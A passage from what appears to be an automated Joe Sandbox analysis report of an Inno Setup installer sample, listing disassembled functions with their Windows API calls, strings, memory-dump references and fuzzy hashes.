                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual$AllocFree
                                                                                      • String ID: d=d
                                                                                      • API String ID: 2087232378-2426951441
                                                                                      • Opcode ID: ac11951010fca1e09d027c43c8ed5b4b578696c80165eb8de0d03b95ec4bb515
                                                                                      • Instruction ID: 1d7fc67d8943aca9bd8b7424c3d760102f2274f63a1bf98f742a2cdc6a51162d
                                                                                      • Opcode Fuzzy Hash: ac11951010fca1e09d027c43c8ed5b4b578696c80165eb8de0d03b95ec4bb515
                                                                                      • Instruction Fuzzy Hash: 28F0A772B0073067EB605A6A4C81F5359C49FC5B94F154076FD0DFF3E9D6B58C0142A9
                                                                                      Function 0041EDC4 Relevance: 4.5, APIs: 3, Instructions: 27windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsWindowVisible.USER32(?), ref: 0041EDD4
                                                                                      • IsWindowEnabled.USER32(?), ref: 0041EDDE
                                                                                      • EnableWindow.USER32(?,00000000), ref: 0041EE04
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$EnableEnabledVisible
                                                                                      • String ID:
                                                                                      • API String ID: 3234591441-0
                                                                                      • Opcode ID: f1041f771c00274fafaec7c92c8c7bfa6f382932e423aeab5ff933265dcc9458
                                                                                      • Instruction ID: feef2f1e36016e7b5cf4fb144cadbc7ab6d373431457e94ba2eb74728d462d7d
                                                                                      • Opcode Fuzzy Hash: f1041f771c00274fafaec7c92c8c7bfa6f382932e423aeab5ff933265dcc9458
                                                                                      • Instruction Fuzzy Hash: B9E0E5B41003006BD711AF67DC85E57769CBB94314F568437AD0597793EA3ED8418AB8
                                                                                      Function 00408544 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 99COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetSystemDefaultLCID.KERNEL32(00000000,0040867A), ref: 00408563
                                                                                        • Part of subcall function 00406D54: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406D71
                                                                                        • Part of subcall function 004084D0: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,004964C0,00000001,?,0040859B,?,00000000,0040867A), ref: 004084EE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                      • String ID: 1I
                                                                                      • API String ID: 1658689577-762079770
                                                                                      • Opcode ID: 6e8303e27ed7ddfbf6acd002e5c720f3c58af445dc5c20a44dc96457956c1da1
                                                                                      • Instruction ID: 74dcf24fece9135f842d9e2340cbc50c81b3ec91f87ebb2824f4d2ce1649f107
                                                                                      • Opcode Fuzzy Hash: 6e8303e27ed7ddfbf6acd002e5c720f3c58af445dc5c20a44dc96457956c1da1
                                                                                      • Instruction Fuzzy Hash: E7316375E00109ABCF00EF95C8819EEB7B9FF84314F118577E815BB285E738AE058B98
                                                                                      Function 0047D0AC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetActiveWindow.USER32(?), ref: 0047D150
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ActiveWindow
                                                                                      • String ID: InitializeWizard
                                                                                      • API String ID: 2558294473-2356795471
                                                                                      • Opcode ID: 669a6a269d9429eb07b4638d8b152cc205309fde65fa91bd383415d10fe050b9
                                                                                      • Instruction ID: 27c915d5e84757d1ee1c922a0b45ecd3517ff57706a6a9b1ea1830c72a43ed0f
                                                                                      • Opcode Fuzzy Hash: 669a6a269d9429eb07b4638d8b152cc205309fde65fa91bd383415d10fe050b9
                                                                                      • Instruction Fuzzy Hash: 9811C2306382009FD710EB29EC82B5A7BF5EB15724F50403BE808872A2DA39AC50CB5D
                                                                                      Function 004775CC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG,?,00000001,?,?,0047E34F,?,00000001,00000000), ref: 0042DC70
                                                                                      • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,00477812,00000000,0047794C), ref: 00477611
                                                                                      Strings
                                                                                      • Software\Microsoft\Windows\CurrentVersion, xrefs: 004775E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpen
                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                                      • API String ID: 47109696-1019749484
                                                                                      • Opcode ID: 225175c1cb3e5d3e9e70e9ef9a971fa01c6206b910d71101a0ac37fcff0035a7
                                                                                      • Instruction ID: 814c6dcea663d1405d948e9489940348151ed5d62cb49aab8d6aacd0da240b25
                                                                                      • Opcode Fuzzy Hash: 225175c1cb3e5d3e9e70e9ef9a971fa01c6206b910d71101a0ac37fcff0035a7
                                                                                      • Instruction Fuzzy Hash: C7F0A7317085146BDA00A65E6D42B9FA6DDCB84778F60443BF608EB346DABDDE0243AD
                                                                                      Function 0046AD6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,?,00497154,?,0046B06F,?,00000000,0046B4F7,?,_is1), ref: 0046AD8F
                                                                                      Strings
                                                                                      • Inno Setup: Setup Version, xrefs: 0046AD8D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Value
                                                                                      • String ID: Inno Setup: Setup Version
                                                                                      • API String ID: 3702945584-4166306022
                                                                                      • Opcode ID: b5001300976c311ff63bf81daa3498fb24628c1a8b44004d588d325ece062412
                                                                                      • Instruction ID: 411328d8211db58a77dae3404ef256999053971fa6961c2aedf3cbf650fcdf7d
                                                                                      • Opcode Fuzzy Hash: b5001300976c311ff63bf81daa3498fb24628c1a8b44004d588d325ece062412
                                                                                      • Instruction Fuzzy Hash: 7FE06D713016043FD710AA6ADC85F5BBADCDF88365F10403AB908EB392D578DD0085A9
                                                                                      Function 0042DA38 Relevance: 3.1, APIs: 2, Instructions: 113registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DB70), ref: 0042DA74
                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DB70), ref: 0042DAE4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: QueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3660427363-0
                                                                                      • Opcode ID: fe899f6043c7f770a4508ac600d0d0e70af19fa3b1a52c17f713553a047210da
                                                                                      • Instruction ID: de7305fe23da407263f6a21fe748e6d6d926aae016943a7179aec9e2dd5a457b
                                                                                      • Opcode Fuzzy Hash: fe899f6043c7f770a4508ac600d0d0e70af19fa3b1a52c17f713553a047210da
                                                                                      • Instruction Fuzzy Hash: 4F417171E04129AFDF10DF91D891BAFBBB8EB01704F918466E810B7240D778BE04CB99
                                                                                      Function 0042DCF8 Relevance: 3.1, APIs: 2, Instructions: 104registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG,?,00000001,?,?,0047E34F,?,00000001,00000000), ref: 0042DC70
                                                                                      • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DDF6,?,?,00000008,00000000,00000000,0042DE23), ref: 0042DD8C
                                                                                      • RegCloseKey.ADVAPI32(?,0042DDFD,?,00000000,00000000,00000000,00000000,00000000,0042DDF6,?,?,00000008,00000000,00000000,0042DE23), ref: 0042DDF0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseEnumOpen
                                                                                      • String ID:
                                                                                      • API String ID: 1332880857-0
                                                                                      • Opcode ID: b395eec5d444746d883dbbe68a26dc186a8be4d3543415a8a9a06ae4829f6fc1
                                                                                      • Instruction ID: 4db75c3f0003ee77c81ad7234f2e5e1b513bc4eba3d2eee43a500da64a91fe5e
                                                                                      • Opcode Fuzzy Hash: b395eec5d444746d883dbbe68a26dc186a8be4d3543415a8a9a06ae4829f6fc1
                                                                                      • Instruction Fuzzy Hash: 4931B270F04649AFDB14DFA6DC52BAFBBB9EB48304F90407BE400F7281D6785A01CA29
                                                                                      Function 0040AF38 Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AF52
                                                                                      • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B0AF,00000000,0040B0C7,?,?,?,00000000), ref: 0040AF63
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Resource$FindFree
                                                                                      • String ID:
                                                                                      • API String ID: 4097029671-0
                                                                                      • Opcode ID: 495ed283f31991be558d7aaf91bbf96f1b13b17f58e3dd61e94c2b353b9623af
                                                                                      • Instruction ID: d0e6d2b3de5701a5b01f0c314f0e154d100cb3f2f79c9d4e2e087994511e300e
                                                                                      • Opcode Fuzzy Hash: 495ed283f31991be558d7aaf91bbf96f1b13b17f58e3dd61e94c2b353b9623af
                                                                                      • Instruction Fuzzy Hash: 7701F7B1704300AFD700EF69DC92E1A77EDDB897187128076F500EB3D0DA799C119669
                                                                                      Function 0041EE14 Relevance: 3.0, APIs: 2, Instructions: 49threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0041EE63
                                                                                      • 73A15940.USER32(00000000,0041EDC4,00000000,00000000,0041EE80,?,00000000,0041EEB7,?,0042E908,?,00000001), ref: 0041EE69
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: A15940CurrentThread
                                                                                      • String ID:
                                                                                      • API String ID: 1959240892-0
                                                                                      • Opcode ID: b328251ae0892c8a3b7f185b32438ae157af80a37aa78e1151a8addd2e42d252
                                                                                      • Instruction ID: 6dec67758a4febc774e22da3091525d30ea0c4d8bfc57ce8b44416be19a69247
                                                                                      • Opcode Fuzzy Hash: b328251ae0892c8a3b7f185b32438ae157af80a37aa78e1151a8addd2e42d252
                                                                                      • Instruction Fuzzy Hash: C3015B74A04704AFD701CFA6EC11956BBE8E789720B22887BE904D37A0EA385811DE18
                                                                                      Function 0040170C Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 48COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00000000,00004003,00401973), ref: 00401766
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeVirtual
                                                                                      • String ID: d=d
                                                                                      • API String ID: 1263568516-2426951441
                                                                                      • Opcode ID: 09cabece21cf584f7b8116981dfbad3f8653d6c5a4f55eb454a10d9661d4edbc
                                                                                      • Instruction ID: dd39995c24d96b1f0cd65365fb3acc738aa13d81c460f04ccbda7f03c85f078f
                                                                                      • Opcode Fuzzy Hash: 09cabece21cf584f7b8116981dfbad3f8653d6c5a4f55eb454a10d9661d4edbc
                                                                                      • Instruction Fuzzy Hash: 6D01FC766442148FC3109F69DCC0E2677E8D794378F16453EDA85673A1D37A6C018BDC
                                                                                      Function 00451888 Relevance: 3.0, APIs: 2, Instructions: 48fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MoveFileA.KERNEL32(00000000,00000000), ref: 004518CA
                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,004518F0), ref: 004518D2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLastMove
                                                                                      • String ID:
                                                                                      • API String ID: 55378915-0
                                                                                      • Opcode ID: 10a17b5f55d8132d355b2be22579e48721c0d02d21db4419b0f25e12a06febb5
                                                                                      • Instruction ID: 4a908479c274ede1fa612a67027dcf523005e30280c6ec4e7261d6cc76548501
                                                                                      • Opcode Fuzzy Hash: 10a17b5f55d8132d355b2be22579e48721c0d02d21db4419b0f25e12a06febb5
                                                                                      • Instruction Fuzzy Hash: B9014971B00304AF9B10FFB99C4259EB7ECDB8832171045BBFC08E3652EA384E048558
                                                                                      Function 00451378 Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004513D7), ref: 004513B1
                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,004513D7), ref: 004513B9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1375471231-0
                                                                                      • Opcode ID: 7fd9e911900e9a06a0dfd278701c74cc3c46c37c0458817335f085c5dd111093
                                                                                      • Instruction ID: 9b23b03b90933790c580962e112c838e42041695dbfb4577ddf6274ef4a18e8c
                                                                                      • Opcode Fuzzy Hash: 7fd9e911900e9a06a0dfd278701c74cc3c46c37c0458817335f085c5dd111093
                                                                                      • Instruction Fuzzy Hash: 2EF0C871A04708BBEB00EFB5AC516AEB7E8EB09315F5045B7FC04E3A52E6794E148698
                                                                                      Function 0042E1F0 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(00008000), ref: 0042E1FA
                                                                                      • LoadLibraryA.KERNEL32(00000000,00000000,0042E244,?,00000000,0042E262,?,00008000), ref: 0042E229
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLibraryLoadMode
                                                                                      • String ID:
                                                                                      • API String ID: 2987862817-0
                                                                                      • Opcode ID: 0102d987cd0908c49357e23cdbf7a47517641d04aa5dfc05fc1f8898bd46d34f
                                                                                      • Instruction ID: 2bd629673230950b16c4bb4544665cc4d3578012b9e0763c9fae70ecea85f9d4
                                                                                      • Opcode Fuzzy Hash: 0102d987cd0908c49357e23cdbf7a47517641d04aa5dfc05fc1f8898bd46d34f
                                                                                      • Instruction Fuzzy Hash: 31F08270714744FEDF019F779C6282BBBECE74DB1479249B6F800A2691E63C5810C939
                                                                                      Function 00450054 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,0046C065,?,00000000), ref: 0045006A
                                                                                      • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,0046C065,?,00000000), ref: 00450072
                                                                                        • Part of subcall function 0044FE10: GetLastError.KERNEL32(0044FC2C,0044FED2,?,00000000,?,00492588,00000001,00000000,00000002,00000000,004926E9,?,?,00000005,00000000,0049271D), ref: 0044FE13
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 1156039329-0
                                                                                      • Opcode ID: f7b6d91780900016932261e5b31036d83abc2770e31421f62e2bd79437fa69ba
                                                                                      • Instruction ID: 619d70630f7d728e19568b0c26e44efacd411b086580920acadf97a9c9154113
                                                                                      • Opcode Fuzzy Hash: f7b6d91780900016932261e5b31036d83abc2770e31421f62e2bd79437fa69ba
                                                                                      • Instruction Fuzzy Hash: F9E012B53042016BEB10EAA5A9C1F3B23DCEF44715F10447EB944CF183D674CC054B69
                                                                                      Function 00478F74 Relevance: 1.6, APIs: 1, Instructions: 128windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendNotifyMessageA.USER32(00010474,00000496,00002711,00000000), ref: 0047912C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageNotifySend
                                                                                      • String ID:
                                                                                      • API String ID: 3556456075-0
                                                                                      • Opcode ID: 1bf78a2a4972fbb2a73e3495687c09ee27ad1c961f8a5cc689fdc3f33d66a45c
                                                                                      • Instruction ID: 7d22008d7a83e2500ddd5853d1c98629ae082a9ef6797e0e4edc72868eccde80
                                                                                      • Opcode Fuzzy Hash: 1bf78a2a4972fbb2a73e3495687c09ee27ad1c961f8a5cc689fdc3f33d66a45c
                                                                                      • Instruction Fuzzy Hash: 884142343240009BCB10FF26D88598A7BA5EB50309B65C5BBB8049F3A7CA3DDD46DB9D
                                                                                      Function 0046A1C4 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • 76CCE550.OLE32(00494B14,00000000,00000001,00494B24,00497054), ref: 0046A2B9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: E550
                                                                                      • String ID:
                                                                                      • API String ID: 734438002-0
                                                                                      • Opcode ID: 1a96fdbb3e90de8797b7c34e8fd7761ef28502cc93813c311678e4427fcc9a8f
                                                                                      • Instruction ID: 28ea0cda059d87ed8d6f055d3f11cf2141d1ab261bbca5563b99c48b31e217e3
                                                                                      • Opcode Fuzzy Hash: 1a96fdbb3e90de8797b7c34e8fd7761ef28502cc93813c311678e4427fcc9a8f
